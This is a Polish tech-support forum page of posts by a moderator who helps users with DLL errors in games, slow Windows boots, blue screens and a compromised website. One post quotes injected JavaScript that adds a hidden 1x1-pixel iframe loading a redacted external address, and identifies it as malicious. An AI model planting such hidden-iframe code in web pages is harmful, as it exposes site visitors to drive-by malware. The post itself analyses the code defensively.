Skocz do zawartości

mgrzeg

Moderatorzy
  • Postów

    991
  • Dołączył

  • Ostatnia wizyta

Treść opublikowana przez mgrzeg

  1. Witam, czy od kupna laptopa instalowałeś jakieś dodatkowe oprogramowanie (np. antywirus)? Instalowałeś jakieś poprawki do systemu, ewentualnie włączałeś dodatkowe funkcje? m.g.
  2. Hej, z dumpa wynika, że została załadowana do pamięci biblioteka d3d10.dll (C:\WINDOWS\system32\d3d10.dll), której prawdę powiedziawszy w Twoim systemie być nie powinno. Wejdź zatem do katalogu c:\windows\system32 i zmień nazwę pliku d3d10.dll na d3d10_old.dll, po czym spróbuj uruchomić grę. m.g.
  3. Witam, c:\> nie jest częścią polecenia, to jest tzw. prompt, ale mniejsza z większą Wykonaj zatem poniższe, po każdym wciśnij 'Enter': 6. Przejdź do katalogu z procdumpem cd \dumps 7. Zrób zrzut procesu FARCRY3.EXE procdump /ma FARCRY3.EXE full.dmp Powodzenia! m.g.
  4. Hej, depends nam za bardzo nie pomógł - nie zgłasza błędu dla bibliotek zlinkowanych statycznie, więc problem jest najprawdopodobniej związany z jakąś biblioteką ładowaną dynamicznie. Jeśli czujesz się na siłach, to spróbujmy zajrzeć do środka problemu. Mam nadzieję, że zrzut pamięci procesu powie nam więcej. Procedura nie jest trywialna, ale dasz sobie radę 1. Na dysku c: utwórz katalog Dumps, tj. c:\dumps 2. Pobierz ze strony Sysinternals ProcDump, zawartość wypakuj do katalogu utworzonego w pkt. 1 3. Uruchom grę 4. W momencie, gdy pojawi się komunikat błędu ('nie znaleziono punktu wejścia...'), to nie zamykaj go. 5. Uruchom wiersz polecenia (np. poprzez start -> uruchom, wpisz "cmd.exe" bez " i enter) 6. Przejdź do katalogu z procdumpem c:\>cd \dumps 7. Zrób zrzut procesu FARCRY3.EXE c:\dumps>procdump /ma FARCRY3.EXE full.dmp 8. Spakuj (np. 7-zipem) plik full.dmp z katalogu c:\dumps, wrzuć np. speedyshare i daj link w odpowiedzi. 9. Możesz już zamknąć komunikat błędu. Powodzenia m.g.
  5. Fazy Nazwa...........|.start(ms)|koniec(ms)|..suma(ms) ------------------------------------------------- Pre.Session.Init|.........0|.....29770|.....29770 Session.Init....|.....29770|....105110|.....75340 Winlogon.Init...|....105110|....148644|.....43533 Explorer.Init...|....148644|....181037|.....32393 Post.Boot.......|....181037|....231237|.....50200 ------------------------------------------------- System.gotowy.po:.....................221,237.sek faktycznie session init jest długi - trwa ponad 75 sek. W tym czasie koszmarnie długo ładowany jest z dysku sterownik karty graficznej - amdkmdag (C:\Windows\system32\drivers\atikmdag.sys) - ponad 13 sek. To faktycznie może być jakiś problem sprzętowy. Możesz także spróbować przeinstalować te sterowniki. m.g.
  6. Hej, wygląda na to, że w katalogu aplikacji masz plik z DX11 (d:\krzysiek-muzyka\call of duty black ops 2\DXGI.DLL, wzięty żywcem z Win7 bez SP1), który korzysta z funkcji dostępnych od wyższych systemów. Spróbuj zmienić nazwę tego pliku z dxgi.dll na dxgi_old.dll i sprawdź, czy będzie ok. Przyznaję, że nie mam pewności, czy ta aplikacja nie jest na sztywno zszyta z DX11, więc szanse nie są duże... m.g.
  7. Powinno być ok, ale na wszelki wypadek sugeruję Ci spróbować zainstalować system na wirtualce podając odczytany klucz - jeśli pójdzie, to jesteś w domu. Dodatkowo, zrób sobie kopię klucza HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, w razie co będziesz mógł offline'owo jeszcze powalczyć z odczytaniem klucza. m.g.
  8. Możesz jeszcze pokusić się o przygotowanie logu zgodnie z opisem [KLIK], przy czym zamiast kroku 7 i 8 spakuj plik .etl i wrzuć na speedyshare.com i link podaj tu. m.g.
  9. Witam, spróbuj zacząć od podobnego wątku: [KLIK] - przygotuj log Dependency Walkera, przy czym przy zapisywaniu wybierz format Dependency Walker Image (*.dwi) i wrzuć na speedyshare.com, a tu w odpowiedzi podaj link. m.g.
  10. Witam na forum, spróbuj zacząć od podobnego wątku: [KLIK] - przygotuj log Dependency Walkera, przy czym przy zapisywaniu wybierz format Dependency Walker Image (*.dwi) i wrzuć na speedyshare.com, a tu w odpowiedzi podaj link. m.g.
  11. Mam prośbę - mógłbyś spakować ten plik i wrzucić spakowany? m.
  12. Hej, zanim wrócisz do Aviry, usuń niektóre przydasie, w tym (użyj autorunsów): - "D:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe" (zamiast narzędzia HP zainstaluj same sterowniki do drukarki) - "D:\Program Files (x86)\HP\Digital Imaging\bin\HpqSRmon.exe" - "C:\Program Files\Microsoft Office\Office14\ONENOTEM.EXE" /tsr - "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" - "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" - "D:\Program Files (x86)\Adobe\Reader 9.0\Reader\reader_sl.exe" - "D:\Program Files (x86)\CyberLink\PowerDVD\PDVDServ.exe" - "D:\Program Files (x86)\CyberLink\PowerDVD\Language\Language.exe" Potem antywirus + ponowny log. xbootmgr -trace boot -traceflags latency+dispatcher -stackwalk profile+cswitch+readythread -notraceflagsinfilename -postbootdelay 180 -resultpath c:\xperf -prepsystem m.g.
  13. Hej, dzięki za ten plik. Jak widać, nie udało się wygenerować ostatecznego logu i mamy do dyspozycji tylko 'szkoleniowy', obcięty do 170 sek., w których Twój system się nie mieści Mam 2 prośby: 1. Kaspersky - odinstaluj tymczasowo. Niestety, generuje tak duże obciążenie dysku, że właściwie nic innego nie widać. 2. AntiBrowserSpy - odinstaluj. Szczerze, nie korzystałem nigdy z tego narzędzia i IMO jego zastosowanie jest raczej ograniczone, nie wiem, czy jest sens obciążać nim system w takim stopniu, jak ma to miejsce u Ciebie. Po wszystkim wygeneruj kolejny log, ustaw może parametr postbootdelay na 240. m.g.
  14. Hej, Ad 4. Wrzuć najświeższy (powinien nazywać się boot_1.etl) m.g.
  15. 1. Fazy Nazwa...........|.start(ms)|koniec(ms)|..suma(ms) ------------------------------------------------- Pre.Session.Init|.........0|......3828|......3828 Session.Init....|......3828|.....13814|......9986 Winlogon.Init...|.....13814|.....18870|......5056 Explorer.Init...|.....18870|.....30861|.....11990 Post.Boot.......|.....30861|.....61861|.....31000 ------------------------------------------------- System.gotowy.po:......................51,861.sek Wygląda na to, że system wstaje w mniej, niż minutę. Jesteś bez AV, więc idealnie nie jest - pewnie możnaby uciąć jeszcze z połowę tego. Walczymy dalej? m.g.
  16. Witam na forum, 1. Fazy startu Nazwa...........|.start(ms)|koniec(ms)|..suma(ms) ------------------------------------------------- Pre.Session.Init|.........0|......7530|......7530 Session.Init....|......7530|.....45459|.....37928 Winlogon.Init...|.....45459|.....61549|.....16090 Explorer.Init...|.....61549|.....79886|.....18336 Post.Boot.......|.....79886|....243886|....164000 ------------------------------------------------- System.gotowy.po:.....................233,886.sek Jednym słowem komputer dochodzi do stanu 'względnej' sprawności w niespełna 4 minuty. Gros z tego czasu (164 sek.) spędza w fazie post boot i najwęższym gardłem jest zdecydowanie dysk, który obciążony jest właściwie w 100% przez cały ten czas. Podejdziemy do tematu w kilku krokach. 2. Sugestie / uwagi Zacznijmy od - Soluto: SolutoService (Soluto PCGenome Core Service) + Soluto.exe, czyli usługa oraz aplikacja uruchamiana przez userinit - są na topie listy najbardziej dyskożernych aplikacji; - SMARTInk.exe + reszta uruchamiana z "C:\Program Files (x86)\SMART Technologies\Education Software\". Wszystkie startują w ramach runonce, więc wystarczy autoruns Bardzo duże obciążenie generuje również AVP (Kaspersky), ale tego na razie zostaw. Pozbądź się także aplikacji typu KSPlus ("C:\Program Files (x86)\Komputer Świat Plus\KSPlus.exe"), tudzież wyłącz automatyczne ładowanie Daemon Tools - prawdopodobnie wszystko do znalezienia gdzieś w autorunsach. 3. Po wszystkim przygotuj kolejny log, tym razem z kilkoma restartami (w międzyczasie nic nie rób ): xbootmgr -trace boot -traceflags latency+dispatcher -stackwalk profile+cswitch+readythread -notraceflagsinfilename -postbootdelay 180 -resultpath c:\xperf -prepsystem m.g.
  17. Pozostaje jeszcze kwestia polityki bezpieczeństwa organizacji (vide przykład Biotechu ze 'Sztuki infiltracji' K. Mitnicka). m.
  18. Hej, wygląda na to, że padłeś ofiarą jakiegoś automatu i jednak Twoja witryna nie jest bezpieczna. Zwróć uwagę na kod opatrzony komentarzem , który wstawia na Twojej stronie ramkę odwołującą się do zewnętrznego serwisu: (function () { var sh = document.createElement('iframe'); sh.src = 'WYCIAPANY_ADRES_PRZEZ_MGRZEGA'; sh.style.position = 'absolute'; sh.style.border = '0'; sh.style.height = '1px'; sh.style.width = '1px'; sh.style.left = '1px'; sh.style.top = '1px'; if (!document.getElementById('sh')) { document.write(' '); document.getElementById('sh').appendChild(sh); } })(); Nie zaglądałem pod wyciapany adres, ale zakładam, że czai się tam zły kod i raczej nie chcesz go nikomu prezentować i raczej na pewno nie Ty to tam wstawiłeś Sprawdź aktualizację środowiska (jedyne, co widać, to Server: IdeaWebServer/v0.80), jeśli dalej siedzi jakiś PHP, czy cuś, to też połataj. m.g.
  19. OK, na szybko: 1. Odinstaluj COMODO 2. Wyłącz wszelkie przydasie HP, w szczególności HP Hotkey Support. Użyj do tego autoruns z sysinternals i odznacz (lub usuń) QLBController.exe. Nie wiem czemu, ale generuje gigantyczny ruch na dysku. Po wszystkim spróbuj jeszcze raz z tymi restartami - powinno się udać. Nie uruchamiaj w międzyczasie niczego dodatkowo, im mniejsze obciążenie, tym lepiej. m.g.
  20. Zanim przygotujesz kolejny plik spróbuj jeszcze paru rzeczy: 1. Zawalcz ze sterownikiem RtkHDAud.sys, który jako jedyny ma półsekundowe opóźnienia w początkowej fazie startu systemu. Sterownik będzie odpowiadał za 'Realtek High Definition Audio', u Ciebie w wersji 6.0.1.5506, zdaje się z listopada 2007 roku. Zacznij od wyłączenia urządzenia w menadżerze urządzeń. 2. Dodatkowo, jeśli nie korzystasz z IPv6, to wyłącz / usuń IPv6 i interfejsy ISATAP, np. poprzez netsh: netsh int isa set state disabled lub korzystając z FixIt Microsoftu: [KLIK] 3. Dalej, przestaw 'wstępne ładowanie do pamięci' na automatycznie. Bez tego -prepsystem, o który w następnych postach poproszę w ogóle nie ma sensu. Po tych krokach przygotuj kolejny log i udostępnij. m.g.
  21. mgrzeg

    Blue screen

    Dzięki za pliki. 1. Czy zaobserwowałeś BSOD przed odinstalowaniem AC3 (jak się domyślam, chodzi o grę Assassin's Creed 3?)? 2. Bardzo podejrzanie wyglądają stosy w każdym z dumpów z 20.11: Każdy z nich zaczyna się w usermode gdzieś w obszarze procesu explorer.exe więc obawiam się, że to może być infekcja podobna do tej: [KLIK] Dlatego przygotuj logi OTL+Extras zgodnie z opisem: [KLIK] m.g.
  22. Witam ponownie, czy możesz przygotować kolejny plik .etl i udostępnić? m.
  23. 1. Fazy Nazwa...........|.start(ms)|koniec(ms)|..suma(ms) ------------------------------------------------- Pre.Session.Init|.........0|......3421|......3421 Session.Init....|......3421|.....12787|......9366 Winlogon.Init...|.....12787|.....27830|.....15043 Explorer.Init...|.....27830|.....58399|.....30568 Post.Boot.......|.....58399|....129699|.....71300 ------------------------------------------------- System.gotowy.po:.....................119,699.sek Tym razem mamy pełen log, niczego po drodze nie straciliśmy. Poprawy wielkiej nie widać (start krótszy o 15 sek od poprzedniego), ale możemy przejść do kolejnych kroków i nie mamy już usług startujących po kilkadziesiąt sekund (poza jedną, ale o tym za chwilę). 2. Sugestie. Nie wiem z czego to wynika, ale Twój antywirus (Avira) generuje gigantyczne obciążenie dysku i startuje ponad 25 sekund. Dlatego sugeruję, żebyś testowo ją odinstalował, uruchomił ponownie komputer, a następnie przygotował kolejny log, tym razem poleceniem: xbootmgr -trace boot -traceflags latency+dispatcher -stackwalk profile+cswitch+readythread -notraceflagsinfilename -postbootdelay 180 -resultpath c:\xperf -prepsystem Po wszystkim nastąpi 6 restartów, po których zostanie wygenerowany log (boot_1.etl), o który poproszę w kolejnym poście. Reszta usług nie wydaje się być jakoś bardzo obciążająca dla komputera, dlatego zobaczmy efekt, jaki da usunięcie tego antywirusa i już bez niego popatrzymy na inne drobiazgi. m.g.
  24. mgrzeg

    Blue screen

    Witam na forum, spakuj zawartość katalogu c:\windows\minidump i wrzuć na speedyshare.com m.g.
  25. Witam na forum, Błąd zdaje się być powiązany z threed.exe, z którym ma problem ESET NOD32. Przygotuj logi zgodnie z opisem: [KLIK] m.g.
×
×
  • Dodaj nową pozycję...